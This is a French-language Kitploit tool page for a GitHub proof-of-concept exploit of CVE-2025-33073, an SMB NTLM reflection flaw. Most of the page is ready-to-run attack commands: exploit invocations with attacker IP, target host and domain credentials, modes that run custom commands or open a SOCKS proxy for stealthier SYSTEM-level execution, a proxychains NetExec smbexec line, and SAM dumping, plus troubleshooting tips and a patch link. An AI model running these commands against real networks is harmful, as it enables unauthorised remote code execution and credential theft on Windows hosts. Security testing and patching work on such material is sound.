Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-33073 — Exploit PoC pour la faille SMB de réflexion NTLM. | Kitploit
Outils/GitHubGitHub/starscow/cve-2025-33073
Analyse des VulnérabilitésExploitationMouvement LatéralPost-ExploitationTests d'IntrusionRed Teaming
GitHubstarscow/cve-2025-33073

CVE-2025-33073

Exploit PoC pour la faille SMB de réflexion NTLM.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-33073

Exploit PoC pour la faille SMB de réflexion NTLM.

Tout le crédit revient à la recherche officielle :
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Prérequis

OS : Kali Linux (la plupart des paquets sont préinstallés).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (inclus dans le dépôt)
  • xterm (uniquement pour l'interface graphique)

Exemple d'utilisation

Interface graphique

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
Télécharger l’outil

image

Commande personnalisée
Au lieu d'exécuter secretsdump, une commande personnalisée peut être exécutée.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
Pour une exécution plus furtive des commandes après qu'une connexion valide en tant que SYSTEM a été établie. --target et --target-ip doivent être identiques ici.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image Une commande personnalisée peut également être exécutée via proxychains au lieu de vider la base SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Exploitation manuelle sans exigence DNS

Si vous êtes dans le même domaine de diffusion que l'appareil et qu'il est vulnérable à l'empoisonnement LLMNR, il est possible d'exploiter un appareil sans avoir à enregistrer un enregistrement DNS.

image

Dépannage

  • J'ai constaté que l'attaque ne fonctionne parfois pas car le nom d'hôte est utilisé pour l'attaque, ce qui entraîne une résolution DNS depuis Kali. Si Kali n'utilise pas le serveur DNS ou si vous recevez un message '/ FAILED' de la part d'impacket-ntlmrelayx, essayez d'ajouter l'hôte à votre fichier /etc/hosts. Cela devrait permettre à l'attaque de fonctionner.
  • Si vous utilisez une adresse IP, l'attaque devrait fonctionner. Parfois, l'exécuter plusieurs fois aboutit à un SUCCESS au lieu d'un échec. Jusqu'à présent, la raison n'est pas parfaitement claire. Je pense que cela a un lien avec le réseau.
  • Essayez une autre méthode de coercition avec -M ou --method.

Wireshark

L'authentification NTLM locale a lieu image

L'authentification NTLM locale n'a pas lieu, ce qui aboutit à une tentative FAILED image

Bon à savoir

  • xterm permet de copier et coller avec le bouton du milieu de la souris.
  • L'enregistrement DNS doit également être connu du client, ce qui peut prendre plus de temps dans certains cas. Par plus de temps, j'entends quelques minutes.
  • Ceci n'est qu'un PoC, ce qui signifie qu'aucun contournement d'AV/EDR n'a été tenté. Utilisation à vos propres risques.

Comment corriger

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073